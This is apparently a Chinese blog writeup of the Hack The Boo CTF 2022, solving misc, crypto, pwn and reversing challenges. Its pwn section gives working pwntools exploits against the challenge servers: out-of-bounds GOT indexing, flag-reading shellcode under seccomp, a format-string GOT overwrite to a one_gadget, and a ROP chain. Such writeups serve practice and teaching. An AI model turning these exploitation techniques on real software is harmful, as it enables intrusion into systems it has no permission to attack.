石氏是时试
石氏是时试

[Hack The Boo CTF 2022] writeup

[Hack The Boo CTF 2022] writeup_第1张图片

一个外国简单比赛,好多人队都答了25题,由于web不会,misc不熟,作了misc3,crypto4,pwn5,rev5不过有的找不到了,慢慢找。

misc

Wrong Spooky Season

 附件也是个流量包,打开后在尾部有数据,追踪TCP流可以看到base64的码

 [Hack The Boo CTF 2022] writeup_第2张图片

 显然是反过来放的,转回来解码得到flag

>>> a = "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS"
>>> from base64 import *
>>> b64decode(a[::-1])
b'HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}\n'

Trick or Breach

 下来的附件是个流量包,全是DNS请求

Standard query 0xa49f A 504b0304140008080800a52c47550000000000000000000000.pumpkincorp.com
Standard query response 0xa49f A 504b0304140008080800a52c47550000000000000000000000.pumpkincorp.com A 147.182.172.189
Standard query 0xdd23 A 0018000000786c2f64726177696e67732f64726177696e6731.pumpkincorp.com
Standard query response 0xdd23 A 0018000000786c2f64726177696e67732f64726177696e6731.pumpkincorp.com A 147.182.172.189
Standard query 0xcf3f A 2e786d6c9dd05d6ec2300c07f013ec0e55de695a181343145e.pumpkincorp.com
Standard query response 0xcf3f A 2e786d6c9dd05d6ec2300c07f013ec0e55de695a181343145e.pumpkincorp.com A 147.182.172.189

显然请求的pumpkincorp.com前的部分是16进制编码的数据,把这些数据弄下来,得到一个PK开头的文件,是个excel文件,打开后有flag

[Hack The Boo CTF 2022] writeup_第3张图片

Halloween Invitation  不会

POOF 附件太大

Downgrade 未完成

作了一部分后边不知道怎么找了

┌──(kali㉿kali)-[~/ctf/pwn_spooky_time]
└─$ nc 161.35.33.243 30240                                                                                          

+-----------+---------------------------------------------------------+
|   Title   |                       Description                       |
+-----------+---------------------------------------------------------+
| Downgrade |         During recent auditing, we noticed that         |
|           |     network authentication is not forced upon remote    |
|           |       connections to our Windows 2012 server. That      |
|           |           led us to investigate our system for          |
|           |  suspicious logins further. Provided the server's event |
|           |       logs, can you find any suspicious successful      |
|           |                          login?                         |
+-----------+---------------------------------------------------------+

Which event log contains information about logon and logoff events? (for example: Setup)
> Security                                                                                                                                                  
[+] Correct!
 
What is the event id for logs for a successful logon to a local computer? (for example: 1337)                                                               
> 4624                                                                                                                                                      
[+] Correct!

Which is the default Active Directory authentication protocol? (for example: http)                                                                          
> Kerberos                                                                                                                                                  
[+] Correct!

Looking at all the logon events, what is the AuthPackage that stands out as different from all the rest? (for example: http)                                
> NTLM                                                                                                                                                      
[+] Correct!
 
[-] Wrong Answer.
What is the timestamp of the suspicious login (yyyy-MM-ddTHH:mm:ss) UTC? (for example, 2021-10-10T08:23:12)                                                   
>

看了个WP,其实就差一点了,认证协议只有3种,所以猜中第3题,第4题,第4题是仅出现一次的情况,所以显然可疑的登录就是唯一的这一个,登录时间是 2022/09/28 21:10:57但试过不对,看WP应该是输入2022-09-28T13:10:57(这个应该标准时间,输入的是+8的)

 [Hack The Boo CTF 2022] writeup_第4张图片

crypto

Gonna-Lift-Em-All

题目给了两个有限域的一元方程

import random

FLAG = b'HTB{??????????????????????????????????????????????????????????????????????}'

def gen_params():
  p = getPrime(1024)
  g = random.randint(2, p-2)
  x = random.randint(2, p-2)
  h = pow(g, x, p)
  return (p, g, h), x

def encrypt(pubkey):
  p, g, h = pubkey
  m = bytes_to_long(FLAG)
  y = random.randint(2, p-2)
  s = pow(h, y, p)
  return (g * y % p, m * s % p)

def main():
  pubkey, privkey = gen_params()
  c1, c2 = encrypt(pubkey)

  with open('data.txt', 'w') as f:
    f.write(f'p = {pubkey[0]}\ng = {pubkey[1]}\nh = {pubkey[2]}\n(c1, c2) = ({c1}, {c2})\n')


if __name__ == "__main__":
  main()

两个方程式:c1 = g*y %p; c2 = m*pow(h,y,p)%p 其中p,g,h,c1,c2已知,通过第1式得到y再通过第2式得到m

p = 163096280281091423983210248406915712517889481034858950909290409636473708049935881617682030048346215988640991054059665720267702269812372029514413149200077540372286640767440712609200928109053348791072129620291461211782445376287196340880230151621619967077864403170491990385250500736122995129377670743204192511487
g = 90013867415033815546788865683138787340981114779795027049849106735163065530238112558925433950669257882773719245540328122774485318132233380232659378189294454934415433502907419484904868579770055146403383222584313613545633012035801235443658074554570316320175379613006002500159040573384221472749392328180810282909
h = 36126929766421201592898598390796462047092189488294899467611358820068759559145016809953567417997852926385712060056759236355651329519671229503584054092862591820977252929713375230785797177168714290835111838057125364932429350418633983021165325131930984126892231131770259051468531005183584452954169653119524751729
(c1, c2) = (159888401067473505158228981260048538206997685715926404215585294103028971525122709370069002987651820789915955483297339998284909198539884370216675928669717336010990834572641551913464452325312178797916891874885912285079465823124506696494765212303264868663818171793272450116611177713890102083844049242593904824396, 119922107693874734193003422004373653093552019951764644568950336416836757753914623024010126542723403161511430245803749782677240741425557896253881748212849840746908130439957915793292025688133503007044034712413879714604088691748282035315237472061427142978538459398404960344186573668737856258157623070654311038584)

#c1 = g*y %p 
from gmpy2 import *
y = c1 * invert(g,p) % p 
print(y)
#c2 = m * s %p , s = h**y %p 
s = pow(h,y,p)
m = c2 * invert(s, p) % p
print(long_to_bytes(m))
#HTB{b3_c4r3ful_wh3n_1mpl3m3n71n6_cryp705y573m5_1n_7h3_mul71pl1c471v3_6r0up}

Fast Carmichael 终于找到

这个想了半天没想到怎么弄,用欧拉伪素数判断方法。在网上能搜到足够的卡迈尔数和一个快速生成方法,但是显然对比的是-1而不是1所以实现不了。等WP吧

终于找到一个,从一篇论文里有一个300以下base 的强伪素数

p = 29674495668685510550154174642905332730771991799853043350995075531276838753171770199594238596428121188033664754218345562493168782883
n = p *(313*(p - 1) + 1)*(353 * (p - 1) + 1)
#2887148238050771212671429597130393991977609459279722700926516024197432303799152733116328983144639225941977803110929349655578418949441740933805615113979999421542416933972905423711002751042080134966731755152859226962916775325475044445856101949404200039904432116776619949629539250452698719329070373564032273701278453899126120309244841494728976885406024976768122077071687938121709811322297802059565867

输入这个数就OK了,主要是考验互联网搜论文的能力,不过按他的链接没有找到他的结果。 

from secret import FLAG
from Crypto.Util.number import isPrime
import socketserver
import signal

class Handler(socketserver.BaseRequestHandler):

    def handle(self):
        signal.alarm(0)
        main(self.request)


class ReusableTCPServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    pass


def sendMessage(s, msg):
    s.send(msg.encode())


def receiveMessage(s, msg):
    sendMessage(s, msg)
    return s.recv(4096).decode().strip()


def generate_basis(n):
    basis = [True] * n

    for i in range(3, int(n**0.5) + 1, 2):
        if basis[i]:
            basis[i * i::2 * i] = [False] * ((n - i * i - 1) // (2 * i) + 1)

    return [2] + [i for i in range(3, n, 2) if basis[i]]


def millerRabin(n, b):
    basis = generate_basis(300)
    if n == 2 or n == 3:
        return True

    if n % 2 == 0:
        return False

    r, s = 0, n - 1
    while s % 2 == 0:
        r += 1
        s //= 2
    for b in basis:
        x = pow(b, s, n)
        if x == 1 or x == n - 1:
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _isPrime(p):
    if p < 1:
        return False
    if (p.bit_length() <= 600) and (p.bit_length() > 1500):
        return False
    if not millerRabin(p, 300):
        return False

    return True


def main(s):
    p = receiveMessage(s, "Give p: ")

    try:
        p = int(p)
    except:
        sendMessage(s, "Error!")

    if _isPrime(p) and not isPrime(p):
        sendMessage(s, FLAG)
    else:
        sendMessage(s, "Conditions not satisfied!")


if __name__ == '__main__':
    socketserver.TCPServer.allow_reuse_address = True
    server = ReusableTCPServer(("0.0.0.0", 1337), Handler)
    server.serve_forever()

Spooky RSA

题和解法找不到了,这个应该是很简单就没写

Whole Lotta Candy

给了两个程序,一个是server另一个是encrypt,其中server可以选择加密方式,加密和取加密后的flag,

from encrypt import Encryptor
from secret import FLAG
import socketserver
import random
import signal
import json

MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR']


class Handler(socketserver.BaseRequestHandler):

    def handle(self):
        signal.alarm(0)
        main(self.request)


class ReusableTCPServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    pass


def sendMessage(s, msg):
    s.send(msg.encode())


def receiveMessage(s, msg):
    sendMessage(s, msg)
    return s.recv(4096).decode().strip()


def main(s):
    mode = random.choice(MODES)
    enc = Encryptor()
    while True:
        try:
            sendMessage(s,
                        f"Please interact with the server using json data!\n")
            sendMessage(s, f"Selected mode is {mode}.\n")
            payload = receiveMessage(
                s,
                "\nOptions:\n\n1.Encrypt flag\n2.Encrypt plaintext\n3.Change mode\n4.Exit\n\n> "
            )
            payload = json.loads(payload)
            option = payload["option"]
            if option == "1":
                ciphertext = enc.encrypt(FLAG, mode).hex()
                response = json.dumps({
                    "response": "encrypted",
                    "ciphertext": ciphertext
                })
                sendMessage(s, "\n" + response + "\n")
            elif option == "2":
                payload = receiveMessage(s, "Enter plaintext: \n")
                payload = json.loads(payload)
                plaintext = payload['plaintext'].encode()
                ciphertext = enc.encrypt(plaintext, mode).hex()
                response = json.dumps({
                    "response": "encrypted",
                    "ciphertext": ciphertext
                })
                sendMessage(s, "\n" + response + "\n")
            elif option == "3":
                response = json.dumps({"modes": MODES})
                sendMessage(
                    s, "These are the supported modes\n" + response + "\n")
                payload = receiveMessage(s, "Expecting modes: \n")
                payload = json.loads(payload)
                mode = random.choice(payload['modes'])
            elif option == "4":
                sendMessage(s, "Bye bye\n")
                exit()
        except Exception as e:
            response = json.dumps({"response": "error", "message": str(e)})
            sendMessage(s, "\n" + response + "\n")
            exit()


if __name__ == "__main__":
    socketserver.TCPServer.allow_reuse_address = True
    server = ReusableTCPServer(("0.0.0.0", 1337), Handler)
    server.serve_forever()

encrypt.py就是用指定的加密方式加密没有问题,略。

漏洞就在于选择加密方式时,可选项由用户输入,这样可以选择CTR加密方式,CTR加密里先生成z0,z1...然后再与明文异或得到密文。这样只要随便输入个明文得到加密结果后就得到了z再与flag的密文异或即可。我输入的是64个0

from pwn import *

a = bytes.fromhex("cdfd3535ef16e064f07bc31843a236f8a8f5af32d8cf6994562bcb973dc223de285a15605cb3b72012bcfd3c69e765f76f6751b52a1cc45b999d78f91fbc8996")
b = bytes.fromhex("b599477e94489f038e14834412a348ffabf2e735b79e6e93075890f861c32a862f5f7a6724b0d86763d5923b31a53a92661f3ee85b628d34e4c22cfa55f1bba48d77ba3555a05476b1e57098b18175ed")
c = b'0'*64

m =bytes([a[i]^b[i]^c[i] for i in range(64)])
print(m)
#b'HTB{KnOWN_pla1N737x7_a77aCk_l19h75_7H3_wAY_7hroU9H_mANy_Mod3z}\x02\x02'

AHS512

一个自制的加密,先将每个字符右移4位再与左移3位或,再作hash,要求输入明文不同但密文相同的值。

from secret import FLAG
from hashlib import sha512
import socketserver
import signal
from random import randint

WELCOME = """
**************** Welcome to the Hash Game. ****************
*                                                         *
*    Hash functions are really spooky.                    *
*    In this game you will have to face your fears.       *
*    Can you find a colision in the updated sha512?       *
*                                                         *
***********************************************************
"""


class Handler(socketserver.BaseRequestHandler):

    def handle(self):
        signal.alarm(0)
        main(self.request)


class ReusableTCPServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    pass


def sendMessage(s, msg):
    s.send(msg.encode())


def receiveMessage(s, msg):
    sendMessage(s, msg)
    return s.recv(4096).decode().strip()


class ahs512():

    def __init__(self, message):
        self.message = message
        self.key = self.generateKey()

    def generateKey(self):
        while True:
            key = randint(2, len(self.message) - 1)
            if len(self.message) % key == 0:
                break

        return key    #2,4,5,10

    def transpose(self, message):           #随机值,但仅有2,4,5,10四种,当两次的随机数相同时即可
        transposed = [0 for _ in message]

        columns = len(message) // self.key

        for i, char in enumerate(message):
            row = i // columns
            col = i % columns
            transposed[col * self.key + row] = char

        return bytes(transposed)

    def rotate(self, message):
        return [((b >> 4) | (b << 3)) & 0xff for b in message]   #首位与尾位有重叠,将任一字符的尾位放在首位即可(原首位为0)

    def hexdigest(self):
        transposed = self.transpose(self.message)
        rotated = self.rotate(transposed)
        return sha512(bytes(rotated)).hexdigest()


def main(s):
    sendMessage(s, WELCOME)

    original_message = b"pumpkin_spice_latte!"   # 70756d706b696e5f73706963655f6c61747465a0
    original_digest = ahs512(original_message).hexdigest()
    sendMessage(
        s,
        f"\nFind a message that generate the same hash as this one: {original_digest}\n"
    )

    while True:
        try:
            message = receiveMessage(s, "\nEnter your message: ")
            message = bytes.fromhex(message)

            digest = ahs512(message).hexdigest()

            if ((original_digest == digest) and (message != original_message)):
                sendMessage(s, f"\n{FLAG}\n")
            else:
                sendMessage(s, "\nConditions not satisfied!\n")

        except KeyboardInterrupt:
            sendMessage(s, "\n\nExiting")
            exit(1)

        except Exception as e:
            sendMessage(s, f"\nAn error occurred while processing data: {e}\n")


if __name__ == '__main__':
    socketserver.TCPServer.allow_reuse_address = True
    server = ReusableTCPServer(("0.0.0.0", 1337), Handler)
    server.serve_forever()

这里右4左3存在重叠,只要把明文的任一字符末位方到首位即可,我改的最后一个!由0x21->0xa0

from pwn import *

context.log_level = 'debug'

while True:
    p = remote('139.59.167.169', 32069)
    p.sendlineafter(b'Enter your message: ', b'70756d706b696e5f73706963655f6c61747465a0')
    p.recvline()
    m = p.recvline()
    if b'not satisfied!' not in m:
        print(m)
    p.close()

pwn

Pumpkin Stand

先看源文

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  __int16 v3; // [rsp+4h] [rbp-4Ch] BYREF
  __int16 v4; // [rsp+6h] [rbp-4Ah] BYREF
  FILE *stream; // [rsp+8h] [rbp-48h]
  char s[8]; // [rsp+10h] [rbp-40h] BYREF
  __int64 v7; // [rsp+18h] [rbp-38h]
  __int64 v8; // [rsp+20h] [rbp-30h]
  __int64 v9; // [rsp+28h] [rbp-28h]
  __int64 v10; // [rsp+30h] [rbp-20h]
  __int64 v11; // [rsp+38h] [rbp-18h]
  unsigned __int64 v12; // [rsp+48h] [rbp-8h]

  v12 = __readfsqword(0x28u);
  setup(argc, argv, envp);
  banner();
  v3 = 0;
  v4 = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        menu();
        __isoc99_scanf("%d", &v3);
        printf("\nHow many do you want?\n\n>> ");
        __isoc99_scanf("%d", &v4);
        if ( v4 > 0 )
          break;
        printf("%s\n[-] You cannot buy less than 1!\n", "\x1B[1;31m");
      }
      pumpcoins -= values[v3] * v4;
      if ( pumpcoins >= 0 )
        break;
      printf("\nCurrent pumpcoins: [%s%d%s]\n\n", "\x1B[1;33m", (unsigned int)pumpcoins, "\x1B[1;34m");
      printf("%s\n[-] Not enough pumpcoins for this!\n\n%s", "\x1B[1;31m", "\x1B[1;34m");
    }
    if ( v3 == 1 )
    {
      printf("\nCurrent pumpcoins: [%s%d%s]\n\n", "\x1B[1;33m", (unsigned int)pumpcoins, "\x1B[1;34m");
      puts("\nGood luck crafting this huge pumpkin with a shovel!\n");
    }
    else
    {
      if ( pumpcoins > 9998 )
      {
        *(_QWORD *)s = 0LL;
        v7 = 0LL;
        v8 = 0LL;
        v9 = 0LL;
        v10 = 0LL;
        v11 = 0LL;
        stream = fopen("./flag.txt", "rb");
        if ( !stream )
        {
          puts("Error opening flag.txt, please contact an Administrator!\n");
          exit(1);
        }
        fgets(s, 48, stream);
        printf("%s\nCongratulations, here is the code to get your laser:\n\n%s\n\n", "\x1B[1;32m", s);
        exit(22);
      }
      printf("%s\n[-] Not enough pumpcoins for this!\n\n%s", "\x1B[1;31m", "\x1B[1;34m");
    }
  }
}

显然当这里的偏移v3得到一个负值就能成功,而v3又没有作前边界检查,从values向前看

.got:0000000000201FF8 98 20 20 00 00 00 00 00       __cxa_finalize_ptr dq offset __imp___cxa_finalize
.got:0000000000201FF8                                                                       ; DATA XREF: __cxa_finalize↑r
.got:0000000000201FF8                                                                       ; __do_global_dtors_aux+9↑r
.got:0000000000201FF8                               _got ends
.got:0000000000201FF8
.data:0000000000202000                               ; ===========================================================================
.data:0000000000202000
.data:0000000000202000                               ; Segment type: Pure data
.data:0000000000202000                               ; Segment permissions: Read/Write
.data:0000000000202000                               _data segment qword public 'DATA' use64
.data:0000000000202000                               assume cs:_data
.data:0000000000202000                               ;org 202000h
.data:0000000000202000                               public __data_start ; weak
.data:0000000000202000 00                            __data_start db    0                    ; Alternative name is '__data_start'
.data:0000000000202000                                                                       ; data_start
.data:0000000000202001 00                            db    0
.data:0000000000202002 00                            db    0
.data:0000000000202003 00                            db    0
.data:0000000000202004 00                            db    0
.data:0000000000202005 00                            db    0
.data:0000000000202006 00                            db    0
.data:0000000000202007 00                            db    0
.data:0000000000202008                               public __dso_handle
.data:0000000000202008                               ; void *_dso_handle
.data:0000000000202008 08 20 20 00 00 00 00 00       __dso_handle dq offset __dso_handle     ; DATA XREF: __do_global_dtors_aux+17↑r
.data:0000000000202008                                                                       ; .data:__dso_handle↓o
.data:0000000000202010                               public values

 它距离got表很近,当向前越界到got时,如果这一项已经有libc的值大概率会是负整数,输入-6即可。

Entity

这个很良心给了源码

#include 
#include 
#include 

static union {
    unsigned long long integer;
    char string[8];
} DataStore;

typedef enum {
    STORE_GET,
    STORE_SET,
    FLAG
} action_t;

typedef enum {
    INTEGER,
    STRING
} field_t;

typedef struct { 
    action_t act;
    field_t field;
} menu_t;

menu_t menu() {
    menu_t res = { 0 };
    char buf[32] = { 0 };
    printf("\n(T)ry to turn it off\n(R)un\n(C)ry\n\n>> ");
    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    switch (buf[0]) {
    case 'T':
        res.act = STORE_SET;
        break;
    case 'R':
        res.act = STORE_GET;
        break;
    case 'C':
        res.act = FLAG;
        return res;
    default:
        puts("\nWhat's this nonsense?!");
        exit(-1);
    }

    printf("\nThis does not seem to work.. (L)ie down or (S)cream\n\n>> ");
    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    switch (buf[0]) {
    case 'L':
        res.field = INTEGER;
        break;
    case 'S':
        res.field = STRING;
        break;
    default:
        printf("\nYou are doomed!\n");
        exit(-1);
    }
    return res;
}

void set_field(field_t f) {
    char buf[32] = {0};
    printf("\nMaybe try a ritual?\n\n>> ");
    fgets(buf, sizeof(buf), stdin);
    switch (f) {
    case INTEGER:
        sscanf(buf, "%llu", &DataStore.integer);
        if (DataStore.integer == 13371337) {
            puts("\nWhat's this nonsense?!");
            exit(-1);
        }
        break;
    case STRING:
        memcpy(DataStore.string, buf, sizeof(DataStore.string));
        break;
    }

}

void get_field(field_t f) {
    printf("\nAnything else to try?\n\n>> ");
    switch (f) {
    case INTEGER:
        printf("%llu\n", DataStore.integer);
        break;
    case STRING:
        printf("%.8s\n", DataStore.string);
        break;
    }
}

void get_flag() {
    if (DataStore.integer == 13371337) {
        system("cat flag.txt");
        exit(0);
    } else {
        puts("\nSorry, this will not work!");
    }
}

int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    bzero(&DataStore, sizeof(DataStore));
    printf("\nSomething strange is coming out of the TV..\n");
    while (1) {
        menu_t result = menu();
        switch (result.act) {
        case STORE_SET:
            set_field(result.field);
            break;
        case STORE_GET:
            get_field(result.field);
            break;
        case FLAG:
            get_flag();
            break;
        }
    }

}

 它定义了一个结构可以放串或数字,检查数字是13371337即可给flag但在输入时仅检查数字,把13371337作为字符串写入即可

from pwn import *

#p = process('./entity')
p = remote('178.62.85.130', 32321)

p.sendlineafter(b'>> ', b'T')
p.sendlineafter(b'>> ', b'S')
p.sendlineafter(b'>> ', p64(13371337))
p.sendlineafter(b'>>', b'C')

print(p.recvline())

Pumpking

这题栈可执行,所以就直接来shellcode就行了,不过用seccomp限制只能用openat,read,write这也不难,有个坑点,一般打开的flag文件id号是3,然后习惯于写3,但这个不是,所以打开文件后读的时候应该取rax的值。

openat的1参与不好弄,直接用绝对路径略过

from pwn import *

p = remote('167.71.138.188', 31251)
#p = process('./pumpking')

elf = ELF('./pumpking')

context.arch='amd64'
context.log_level = 'debug'

#gdb.attach(p)
#pause()

p.sendlineafter(b': ', b"pumpk1ngRulez")

shellcode  = '''
push 0x7478
mov rax, 0x742e67616c662f66
push rax
mov rax,0x74632f656d6f682f
push rax
mov rdi, 0
mov rsi, rsp
xor rdx, rdx 
xor rcx, rcx
push 257 
pop rax
syscall

mov rdi,rax  /* file id */
mov rsi,rsp
mov rdx,0x50
mov rax,0 
syscall

mov rax,1
mov rdi,1
mov rsi,rsp
mov rdx,0x150
syscall 
'''

#shellcode = "mov rdi,1;mov rsi,rsp;sub rsi,0x100;mov rdx,0x500;mov rax,1;syscall"
shellcode = asm(shellcode)

p.sendlineafter(b'>> \0\0', shellcode)
print(p.recvall())
#p.shutdown()
p.interactive()

Spooky Time

这题有两次执行无固定格式串的printf

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char format[12]; // [rsp+4h] [rbp-14Ch] BYREF
  char v6[312]; // [rsp+10h] [rbp-140h] BYREF
  unsigned __int64 v7; // [rsp+148h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setup();
  banner();
  puts("It's your chance to scare those little kids, say something scary!\n");
  __isoc99_scanf("%11s", format);
  puts("\nSeriously?? I bet you can do better than ");
  printf(format);
  puts("\nAnyway, here comes another bunch of kids, let's try one more time..");
  puts("\n");
  __isoc99_scanf("%299s", v6);
  puts("\nOk, you are not good with that, do you think that was scary??\n");
  printf(v6);
  puts("Better luck next time!\n");
  return v7 - __readfsqword(0x28u);
}

第1次有长度限制,恰好可以从3和51分别得到题目加载地址和libc地址

第2次想不到好办法,由于one_gadget本身不一定能用,所以不优先考虑,没办法了回到这,将got.puts改为one[1]

from pwn import *

#p = process('./spooky_time')
p = remote('161.35.164.157',31653)

context(arch='amd64', log_level='debug')

elf = ELF('./spooky_time')
libc_elf = ELF('./glibc/libc.so.6')

p.sendlineafter(b"It's your chance to scare those little kids, say something scary!\n\n", b'%51$p,%3$p')
p.recvuntil(b'Seriously?? I bet you can do better than \n')
pwn_base = int(p.recvuntil(b',', drop=True), 16) - elf.sym['main']
libc_base = int(p.recvline(), 16) - libc_elf.sym['write'] - 23
libc_elf.address = libc_base
elf.address = pwn_base
print('pwn:', hex(pwn_base))
print('libc:', hex(libc_base))

one = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]

payload = fmtstr_payload(8, {elf.got['puts']: libc_base + one[2]})
p.sendlineafter(b"let's try one more time..\n\n", payload)

p.interactive()
#HTB{n0th1ng_sc4r1eR_th4n_fsb_w1th0ut_r3lR0}

Finale

这题有个提示:用了自制libc。所以虽然可以溢出但无法利用system,只能用ROP,而只提供了rsi,rdi没有rdx所以3参有点麻烦。

ssize_t finale()
{
  char buf[64]; // [rsp+0h] [rbp-40h] BYREF

  printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck: [%p]", buf);
  printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: ");
  fflush(stdin);
  fflush(_bss_start);
  read(0, buf, 0x1000uLL);
  return write(1, "\n[Strange man in mask]: That's a nice wish! Let the Spooktober Spirit be with you!\n\n", 0x54uLL);
}

非常直白的一个溢出0x1000,当read时发现rdx=0,于是向前找能不能有个ret前rdx有值的,找到0x401476也就是这个read后也write三参的位置。然后在read前先调用它得到rdx再执行后边的操作。这前边用到leave;ret还要把溢出时破坏的rbp给恢复一下

from pwn import *

#p = process('./finale')
p = remote('161.35.33.243', 30917)

context.log_level = 'debug'
context.arch = 'amd64'

elf = ELF('./finale')

pop_rbp = 0x00000000004012bd # pop rbp ; ret
pop_rdi = 0x00000000004012d6 # pop rdi ; ret
pop_rsi = 0x00000000004012d8 # pop rsi ; ret

#gdb.attach(p, 'b*0x40148f')

p.sendlineafter(b'tell us the secret phrase: ', b's34s0nf1n4l3b00')

p.recvuntil(b'with you for good luck: [')
stack = int(p.recvuntil(b']', drop=True), 16)

pay = b'flag.txt'.ljust(0x48,b'\x00') 
pay+= flat(pop_rdi, stack, pop_rsi, 0, elf.plt['open'])
pay+= flat(pop_rbp, stack+0x80, 0x401476, pop_rdi,3, pop_rsi, 0x404200, elf.plt['read'])
pay+= flat(pop_rdi, 0x404200, elf.plt['puts'])
p.sendlineafter(b'Now, tell us a wish for next year: ', pay)
p.recvuntil(b'Let the Spooktober Spirit be with you!\n\n')

print(p.recvline())

p.interactive()

rev

Cult Meeting

IDA打开可以看到flag

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("\x1B[3mYou knock on the door and a panel slides back\x1B[0m");
  puts(asc_2040);
  fwrite("\"What is the password for this week's meeting?\" ", 1uLL, 0x30uLL, _bss_start);
  fgets(s, 64, stdin);
  *strchr(s, 10) = 0;
  if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") )
  {
    puts("\x1B[3mThe panel slides closed and the lock clicks\x1B[0m");
    puts("|      | \"Welcome inside...\" ");
    system("/bin/sh");
  }
  else
  {
    puts("   \\/");
    puts(asc_2130);
  }
  return 0;
}

EncodedPayload

这是个32位程序,不能反编译,也看不明白流程,跟进去执行然后在内存里搜HTB找到flag

'''
gdb-peda$ find HTB
Searching for 'HTB' in: None ranges
Found 6 results, display max 6 items:
 [heap] : 0x5555555757ed ("HTB{PLz_strace_M333}")
 [heap] : 0x555555575830 ("HTB{PLz_strace_M333}")
 [heap] : 0x5555555758a0 ("HTB{PLz_strace_M333}")
 [heap] : 0x5555555758e8 ("HTB{PLz_strace_M333}\n")
 [heap] : 0x555555576420 ("HTB{PLz_strace_M333}\n")
[stack] : 0x7fffffffefdb ("HTB{PLz_strace_M333}")
'''

Ghost Wrangler

找不着题了,应该是极简题

Ouija

ida打开看到类似flag的串

  setvbuf(stdout, 0LL, 2, 0LL);
  v6 = strdup("ZLT{Svvafy_kdwwhk_lg_qgmj_ugvw_escwk_al_wskq_lg_ghlaearw_dslwj!}");
  puts("Retrieving key.");
  sleep(0xAu);

猜是移位密码

a = "ZLT{Svvafy_kdwwhk_lg_qgmj_ugvw_escwk_al_wskq_lg_ghlaearw_dslwj!}"

flag = ''
for v in a:
    if 'A'<= v <= 'Z':
        flag += chr((ord(v)- 0x41 + 8)% 26 + 0x41 )
    elif 'a'<= v <= 'z':
        flag += chr((ord(v)- 0x61 + 8)% 26 + 0x61 )
    else:
        flag += v

print(flag)
#HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!}

Secured Transfer

因为其它题都特别简单,这题猜他用的标准的库

__int64 __fastcall sub_16AF(__int64 a1, unsigned int a2, __int64 a3)
{
  __int64 v4; // rax
  unsigned int v6; // [rsp+28h] [rbp-48h] BYREF
  unsigned int v7; // [rsp+2Ch] [rbp-44h]
  const char *v8; // [rsp+30h] [rbp-40h]
  __int64 v9; // [rsp+38h] [rbp-38h]
  char v10[40]; // [rsp+40h] [rbp-30h] BYREF
  unsigned __int64 v11; // [rsp+68h] [rbp-8h]

  v11 = __readfsqword(0x28u);
  qmemcpy(v10, "supersecretkeyusedforencryption!", 32);
  v8 = "someinitialvalue";
  v9 = EVP_CIPHER_CTX_new();
  if ( !v9 )
    return 0LL;
  v4 = EVP_aes_256_cbc();
  if ( (unsigned int)EVP_DecryptInit_ex(v9, v4, 0LL, v10, v8) != 1 )
    return 0LL;
  if ( (unsigned int)EVP_DecryptUpdate(v9, a3, &v6, a1, a2) != 1 )
    return 0LL;
  v7 = v6;
  if ( (unsigned int)EVP_DecryptFinal_ex(v9, (int)v6 + a3, &v6) != 1 )
    return 0LL;
  v7 += v6;
  EVP_CIPHER_CTX_free(v9);
  return v7;
}

看名字是aes_256_cbc直接用程序解密

from Crypto.Cipher import AES

key = b"supersecretkeyusedforencryption!"
iv = b"someinitialvalue"

c = bytes.fromhex('5f558867993dccc99879f7ca39c5e406972f84a3a9dd5d48972421ff375cb18c')

aes = AES.new(key,AES.MODE_CBC,iv)
m = aes.decrypt(c)
print(m)
#b'HTB{vryS3CuR3_F1L3_TR4nsf3r}\x04\x04\x04\x04'

你可能感兴趣的:(CTF,crypto,CTF,reverse,CTF,pwn,CTF)

  • golang 加密 大鲤余 Golanggolang开发语言后端
    代码示例packageutilsimport("crypto/md5""encoding/hex""golang.org/x/crypto/bcrypt")//BcryptHash使用bcrypt对数据进行加密funcBcryptHash(passwordstring)string{bytes,_:=bcrypt.GenerateFromPassword([]byte(password),bcry
  • react native 总结 一切顺势而行 reactnativereact.jsjavascript
    reactapp.js相当与vueapp.vueimportReactfrom'react';import'./App.css';importReactRoutefrom'./router'import{HashRouterasRouter,Link}from'react-router-dom'classAppextendsReact.Component{constructor(props){su
  • 11 React 组件通信 父传子 a457636876 Reactreact.jsjavascript前端
    在React中实现组件通信是非常常见的需求,其中包括父子组件通信。以下是几种常见的父子组件通信的例子,以及需要注意的知识:Props传递:这是最基本的父子组件通信方式。父组件通过props将数据传递给子组件。//ParentComponent.jsimportReactfrom'react';importChildComponentfrom'./ChildComponent';functionPa
  • 论文整理:隐私签名 yixvxi Survey文档资料学习
    最近准备开题了(苦恼…),整理一些看过/没看过的论文。持续更新…数字签名:隐私数字签名的定义&安全性(book)0.Deffie-Hellman.NewDirectionsinCryptography.1976Katz,J.(2010).DigitalSignatures:BackgroundandDefinitions.In:DigitalSignatures.Springer,Boston,M
  • [commonjs--resolver] Missing “./jsx-runtime.js“ specifier in “react“ package 清羽_ls 前端&&沉淀javascriptreact.js前端
    修复vite构建时错误vite打包,第三方包引用的react版本不一致问题修复(不是最优解)//vite.config.jsimport{defineConfig}from'vite';importreactfrom'@vitejs/plugin-react';importpathfrom'path';exportdefaultdefineConfig({plugins:[react(),//如果
